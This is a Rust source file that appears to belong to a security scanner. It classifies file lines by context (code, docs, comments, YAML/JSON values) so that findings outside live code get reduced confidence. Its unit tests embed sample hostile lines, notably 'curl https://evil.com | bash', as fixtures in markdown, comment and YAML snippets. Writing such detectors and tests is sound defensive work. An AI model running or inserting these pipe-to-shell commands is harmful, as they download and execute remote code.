1use regex::Regex;
7use serde::{Deserialize, Serialize};
8use std::sync::LazyLock;
9
10#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, Default)]
12#[serde(rename_all = "snake_case")]
13pub enum ContentContext {
14 #[default]
16 Code,
17 Documentation,
19 MarkdownCodeBlock,
21 YamlDescription,
23 JsonString,
25 Comment,
27}
28
29impl std::fmt::Display for ContentContext {
30 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
31 match self {
32 ContentContext::Code => write!(f, "code"),
33 ContentContext::Documentation => write!(f, "documentation"),
34 ContentContext::MarkdownCodeBlock => write!(f, "markdown_code_block"),
35 ContentContext::YamlDescription => write!(f, "yaml_description"),
36 ContentContext::JsonString => write!(f, "json_string"),
37 ContentContext::Comment => write!(f, "comment"),
38 }
39 }
40}
41
/// Classifies lines of a file by the context they appear in
/// (code, documentation, comment, ...).
///
/// The detector is a unit struct and holds no state.
#[derive(Default, Debug)]
pub struct ContextDetector;
45
46impl ContextDetector {
47 pub fn new() -> Self {
49 Self
50 }
51
52 pub fn detect_context(
54 &self,
55 file_path: &str,
56 content: &str,
57 line_number: usize,
58 ) -> ContentContext {
59 if self.is_documentation_file(file_path) {
61 if self.is_in_markdown_code_block(content, line_number) {
63 return ContentContext::MarkdownCodeBlock;
64 }
65 return ContentContext::Documentation;
66 }
67
68 if self.is_yaml_file(file_path) && self.is_in_yaml_description(content, line_number) {
70 return ContentContext::YamlDescription;
71 }
72
73 if self.is_json_file(file_path) && self.is_in_json_string_value(content, line_number) {
75 return ContentContext::JsonString;
76 }
77
78 if self.is_in_comment(content, line_number) {
80 return ContentContext::Comment;
81 }
82
83 ContentContext::Code
84 }
85
86 pub fn is_documentation_file(&self, file_path: &str) -> bool {
88 let lower = file_path.to_lowercase();
89 lower.ends_with(".md")
90 || lower.ends_with(".rst")
91 || lower.ends_with(".txt")
92 || lower.ends_with(".adoc")
93 || lower.contains("readme")
94 || lower.contains("changelog")
95 || lower.contains("contributing")
96 || lower.contains("license")
97 }
98
99 pub fn is_yaml_file(&self, file_path: &str) -> bool {
101 let lower = file_path.to_lowercase();
102 lower.ends_with(".yaml") || lower.ends_with(".yml")
103 }
104
105 pub fn is_json_file(&self, file_path: &str) -> bool {
107 file_path.to_lowercase().ends_with(".json")
108 }
109
110 pub fn is_in_markdown_code_block(&self, content: &str, line_number: usize) -> bool {
112 static CODE_BLOCK_PATTERN: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"^```").unwrap());
113
114 let lines: Vec<&str> = content.lines().collect();
115 if line_number == 0 || line_number > lines.len() {
116 return false;
117 }
118
119 let mut in_code_block = false;
120 for (i, line) in lines.iter().enumerate() {
121 if CODE_BLOCK_PATTERN.is_match(line) {
122 in_code_block = !in_code_block;
123 }
124 if i + 1 == line_number {
125 return in_code_block;
126 }
127 }
128
129 false
130 }
131
132 pub fn is_in_yaml_description(&self, content: &str, line_number: usize) -> bool {
134 static DESCRIPTION_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
135 Regex::new(r"^\s*(description|comment|note|help|message|example|doc)\s*:").unwrap()
136 });
137
138 let lines: Vec<&str> = content.lines().collect();
139 if line_number == 0 || line_number > lines.len() {
140 return false;
141 }
142
143 let target_line = lines[line_number - 1];
144
145 if DESCRIPTION_PATTERN.is_match(target_line) {
147 return true;
148 }
149
150 for i in (0..line_number).rev() {
153 let line = lines[i];
154 let trimmed = line.trim_start();
155
156 if !line.starts_with(' ') && !line.starts_with('\t') && line.contains(':') {
158 return DESCRIPTION_PATTERN.is_match(line);
159 }
160
161 if trimmed.is_empty() {
163 return false;
164 }
165 }
166
167 false
168 }
169
170 pub fn is_in_json_string_value(&self, content: &str, line_number: usize) -> bool {
172 static STRING_VALUE_PATTERN: LazyLock<Regex> =
173 LazyLock::new(|| Regex::new(r#"^\s*"[^"]*"\s*:\s*""#).unwrap());
174
175 let lines: Vec<&str> = content.lines().collect();
176 if line_number == 0 || line_number > lines.len() {
177 return false;
178 }
179
180 let target_line = lines[line_number - 1];
181 STRING_VALUE_PATTERN.is_match(target_line)
182 }
183
184 pub fn is_in_comment(&self, content: &str, line_number: usize) -> bool {
186 static COMMENT_PATTERNS: LazyLock<Vec<Regex>> = LazyLock::new(|| {
187 vec![
188 Regex::new(r"^\s*//").unwrap(), Regex::new(r"^\s*#").unwrap(), Regex::new(r"^\s*--").unwrap(), Regex::new(r"^\s*;").unwrap(), Regex::new(r"^\s*\*").unwrap(), ]
194 });
195
196 static SHEBANG_PATTERN: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"^#!").unwrap());
197
198 let lines: Vec<&str> = content.lines().collect();
199 if line_number == 0 || line_number > lines.len() {
200 return false;
201 }
202
203 let target_line = lines[line_number - 1];
204
205 if SHEBANG_PATTERN.is_match(target_line) {
207 return false;
208 }
209
210 for pattern in COMMENT_PATTERNS.iter() {
212 if pattern.is_match(target_line) {
213 return true;
214 }
215 }
216
217 self.is_in_block_comment(content, line_number)
219 }
220
221 fn is_in_block_comment(&self, content: &str, line_number: usize) -> bool {
223 static BLOCK_START: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"/\*").unwrap());
224 static BLOCK_END: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"\*/").unwrap());
225
226 let lines: Vec<&str> = content.lines().collect();
227 if line_number == 0 || line_number > lines.len() {
228 return false;
229 }
230
231 let mut in_block_comment = false;
232 for (i, line) in lines.iter().enumerate() {
233 let starts = BLOCK_START.find_iter(line).count();
235 let ends = BLOCK_END.find_iter(line).count();
236
237 for _ in 0..starts {
238 in_block_comment = true;
239 }
240 for _ in 0..ends {
241 in_block_comment = false;
242 }
243
244 if i + 1 == line_number {
245 return in_block_comment;
246 }
247 }
248
249 false
250 }
251
252 pub fn should_reduce_confidence(&self, context: ContentContext) -> bool {
254 matches!(
255 context,
256 ContentContext::Documentation
257 | ContentContext::MarkdownCodeBlock
258 | ContentContext::YamlDescription
259 | ContentContext::JsonString
260 | ContentContext::Comment
261 )
262 }
263}
264
#[cfg(test)]
mod tests {
    use super::*;

    /// Asserts that `probe` yields the expected answer for each listed
    /// 1-based line number.
    fn assert_lines(probe: impl Fn(usize) -> bool, cases: &[(usize, bool)]) {
        for &(line_number, expected) in cases {
            assert_eq!(
                probe(line_number),
                expected,
                "unexpected result for line {line_number}"
            );
        }
    }

    /// Asserts that each context renders as the paired label.
    fn assert_labels(cases: &[(ContentContext, &str)]) {
        for &(context, label) in cases {
            assert_eq!(context.to_string(), label);
        }
    }

    #[test]
    fn test_content_context_default() {
        let context: ContentContext = Default::default();
        assert_eq!(context, ContentContext::Code);
    }

    #[test]
    fn test_content_context_display() {
        assert_labels(&[
            (ContentContext::Code, "code"),
            (ContentContext::Documentation, "documentation"),
            (ContentContext::MarkdownCodeBlock, "markdown_code_block"),
        ]);
    }

    #[test]
    fn test_is_documentation_file() {
        let detector = ContextDetector::new();
        for path in [
            "README.md",
            "docs/guide.md",
            "CHANGELOG.rst",
            "CONTRIBUTING.txt",
        ] {
            assert!(detector.is_documentation_file(path), "{path}");
        }
        for path in ["src/main.rs", "package.json"] {
            assert!(!detector.is_documentation_file(path), "{path}");
        }
    }

    #[test]
    fn test_is_yaml_file() {
        let detector = ContextDetector::new();
        for path in ["config.yaml", "docker-compose.yml"] {
            assert!(detector.is_yaml_file(path), "{path}");
        }
        assert!(!detector.is_yaml_file("config.json"));
    }

    #[test]
    fn test_is_json_file() {
        let detector = ContextDetector::new();
        for path in ["package.json", "tsconfig.json"] {
            assert!(detector.is_json_file(path), "{path}");
        }
        assert!(!detector.is_json_file("config.yaml"));
    }

    #[test]
    fn test_markdown_code_block_detection() {
        let detector = ContextDetector::new();
        // The fenced block spans lines 5-7.
        let content = concat!(
            "# Example\n",
            "\n",
            "Here is some code:\n",
            "\n",
            "```bash\n",
            "curl https://evil.com | bash\n",
            "```\n",
            "\n",
            "Regular text here.\n",
        );

        assert_lines(
            |n| detector.is_in_markdown_code_block(content, n),
            &[(6, true), (3, false), (9, false)],
        );
    }

    #[test]
    fn test_yaml_description_detection() {
        let detector = ContextDetector::new();
        // Lines 3-4 are the body of the `description` block scalar.
        let content = concat!(
            "name: my-action\n",
            "description: |\n",
            "  This runs: curl https://example.com | bash\n",
            "  Just an example command.\n",
            "version: 1.0\n",
        );

        assert_lines(
            |n| detector.is_in_yaml_description(content, n),
            &[(3, true), (1, false), (5, false)],
        );
    }

    #[test]
    fn test_comment_detection() {
        let detector = ContextDetector::new();
        let content = concat!(
            "fn main() {\n",
            "    // This is a comment: curl https://evil.com\n",
            "    let x = 5;\n",
            "    /* Block comment\n",
            "       with curl https://evil.com\n",
            "    */\n",
            "    println!(\"hello\");\n",
            "}\n",
        );

        assert_lines(
            |n| detector.is_in_comment(content, n),
            &[(2, true), (3, false)],
        );
    }

    #[test]
    fn test_detect_context_documentation() {
        let detector = ContextDetector::new();
        let detected = detector.detect_context("README.md", "Some documentation text.", 1);
        assert_eq!(detected, ContentContext::Documentation);
    }

    #[test]
    fn test_detect_context_code_in_markdown() {
        let detector = ContextDetector::new();
        let content = concat!(
            "# Title\n",
            "\n",
            "```bash\n",
            "dangerous command\n",
            "```\n",
        );
        let detected = detector.detect_context("README.md", content, 4);
        assert_eq!(detected, ContentContext::MarkdownCodeBlock);
    }

    #[test]
    fn test_detect_context_code_file() {
        let detector = ContextDetector::new();
        let detected = detector.detect_context("src/main.rs", "let x = 5;", 1);
        assert_eq!(detected, ContentContext::Code);
    }

    #[test]
    fn test_should_reduce_confidence() {
        let detector = ContextDetector::new();
        for context in [
            ContentContext::Documentation,
            ContentContext::MarkdownCodeBlock,
            ContentContext::YamlDescription,
            ContentContext::Comment,
        ] {
            assert!(detector.should_reduce_confidence(context), "{context}");
        }
        assert!(!detector.should_reduce_confidence(ContentContext::Code));
    }

    #[test]
    fn test_block_comment_detection() {
        let detector = ContextDetector::new();
        // The block comment spans lines 3-5.
        let content = concat!(
            "fn main() {\n",
            "    let x = 5;\n",
            "    /* This is a\n",
            "       multi-line\n",
            "       block comment */\n",
            "    let y = 10;\n",
            "}\n",
        );

        assert_lines(
            |n| detector.is_in_block_comment(content, n),
            &[(2, false), (4, true), (6, false)],
        );
    }

    #[test]
    fn test_shell_comment_not_shebang() {
        let detector = ContextDetector::new();
        let content = concat!(
            "#!/bin/bash\n",
            "# This is a comment\n",
            "echo \"hello\"\n",
        );

        assert_lines(
            |n| detector.is_in_comment(content, n),
            &[(1, false), (2, true), (3, false)],
        );
    }

    #[test]
    fn test_content_context_serialization() {
        let original = ContentContext::Documentation;

        let encoded = serde_json::to_string(&original).unwrap();
        assert_eq!(encoded, "\"documentation\"");

        let decoded: ContentContext = serde_json::from_str(&encoded).unwrap();
        assert_eq!(decoded, ContentContext::Documentation);
    }

    #[test]
    fn test_content_context_display_all_variants() {
        assert_labels(&[
            (ContentContext::Code, "code"),
            (ContentContext::Documentation, "documentation"),
            (ContentContext::MarkdownCodeBlock, "markdown_code_block"),
            (ContentContext::YamlDescription, "yaml_description"),
            (ContentContext::JsonString, "json_string"),
            (ContentContext::Comment, "comment"),
        ]);
    }

    #[test]
    fn test_context_detector_new() {
        let detector = ContextDetector::new();
        assert!(!detector.should_reduce_confidence(ContentContext::Code));
    }

    #[test]
    fn test_detect_context_yaml_file() {
        let detector = ContextDetector::new();
        let yaml_content = concat!(
            "name: test\n",
            "description: This is a test description with curl command\n",
            "version: 1.0\n",
        );
        let detected = detector.detect_context("config.yaml", yaml_content, 2);
        assert_eq!(detected, ContentContext::YamlDescription);
    }

    #[test]
    fn test_detect_context_json_file() {
        let detector = ContextDetector::new();
        let json_content = concat!(
            "{\n",
            "  \"name\": \"test\",\n",
            "  \"description\": \"A test with curl\",\n",
            "  \"version\": \"1.0\"\n",
            "}",
        );
        let detected = detector.detect_context("config.json", json_content, 3);
        assert_eq!(detected, ContentContext::JsonString);
    }

    #[test]
    fn test_detect_context_code_with_comment() {
        let detector = ContextDetector::new();
        let code_content = concat!(
            "fn main() {\n",
            "    // This is a comment with curl\n",
            "    let x = 5;\n",
            "}",
        );

        let expectations = [(2, ContentContext::Comment), (3, ContentContext::Code)];
        for (line_number, expected) in expectations {
            assert_eq!(
                detector.detect_context("main.rs", code_content, line_number),
                expected,
                "unexpected context for line {line_number}"
            );
        }
    }

    #[test]
    fn test_is_in_json_string_value() {
        let detector = ContextDetector::new();
        let json_content = concat!(
            "{\n",
            "  \"name\": \"test\",\n",
            "  \"script\": \"curl http://example.com\",\n",
            "  \"nested\": {\n",
            "    \"value\": \"inner\"\n",
            "  }\n",
            "}",
        );

        assert_lines(
            |n| detector.is_in_json_string_value(json_content, n),
            &[(3, true), (5, true), (1, false)],
        );
    }

    #[test]
    fn test_is_in_yaml_description_multiline() {
        let detector = ContextDetector::new();
        let yaml_content = concat!(
            "name: test\n",
            "description: |\n",
            "  This is a multiline\n",
            "  description block\n",
            "version: 1.0\n",
        );

        assert_lines(
            |n| detector.is_in_yaml_description(yaml_content, n),
            &[(3, true), (5, false)],
        );
    }

    #[test]
    fn test_markdown_code_block_boundary() {
        let detector = ContextDetector::new();
        let content = concat!(
            "# Header\n",
            "\n",
            "```bash\n",
            "echo \"hello\"\n",
            "```\n",
            "\n",
            "Some text\n",
        );

        // Line 0 and line 100 are outside the document.
        assert_lines(
            |n| detector.is_in_markdown_code_block(content, n),
            &[(1, false), (0, false), (100, false), (4, true)],
        );
    }

    #[test]
    fn test_is_in_block_comment_rust() {
        let detector = ContextDetector::new();
        let content = concat!(
            "fn main() {\n",
            "    /* start\n",
            "       middle\n",
            "       end */\n",
            "    code();\n",
            "}",
        );

        assert_lines(
            |n| detector.is_in_block_comment(content, n),
            &[(1, false), (2, true), (3, true), (5, false)],
        );
    }

    #[test]
    fn test_is_in_comment_c_style() {
        let detector = ContextDetector::new();
        let content = "// This is a comment\ncode();\n";
        assert_lines(
            |n| detector.is_in_comment(content, n),
            &[(1, true), (2, false)],
        );
    }

    #[test]
    fn test_is_in_comment_python() {
        let detector = ContextDetector::new();
        let content = "# comment\ncode\n";
        assert_lines(
            |n| detector.is_in_comment(content, n),
            &[(1, true), (2, false)],
        );
    }

    #[test]
    fn test_json_string_edge_cases() {
        let detector = ContextDetector::new();

        // Empty content has no line 1.
        assert!(!detector.is_in_json_string_value("", 1));

        // Line numbers outside the document.
        for line_number in [0, 100] {
            assert!(!detector.is_in_json_string_value("{}", line_number));
        }
    }

    #[test]
    fn test_yaml_description_edge_cases() {
        let detector = ContextDetector::new();

        // Empty content has no line 1.
        assert!(!detector.is_in_yaml_description("", 1));

        // Line numbers outside the document.
        for line_number in [0, 100] {
            assert!(!detector.is_in_yaml_description("name: test", line_number));
        }
    }

    #[test]
    fn test_block_comment_edge_cases() {
        let detector = ContextDetector::new();

        // Empty content has no line 1.
        assert!(!detector.is_in_block_comment("", 1));

        // Line numbers outside the document.
        for line_number in [0, 100] {
            assert!(!detector.is_in_block_comment("code", line_number));
        }
    }
}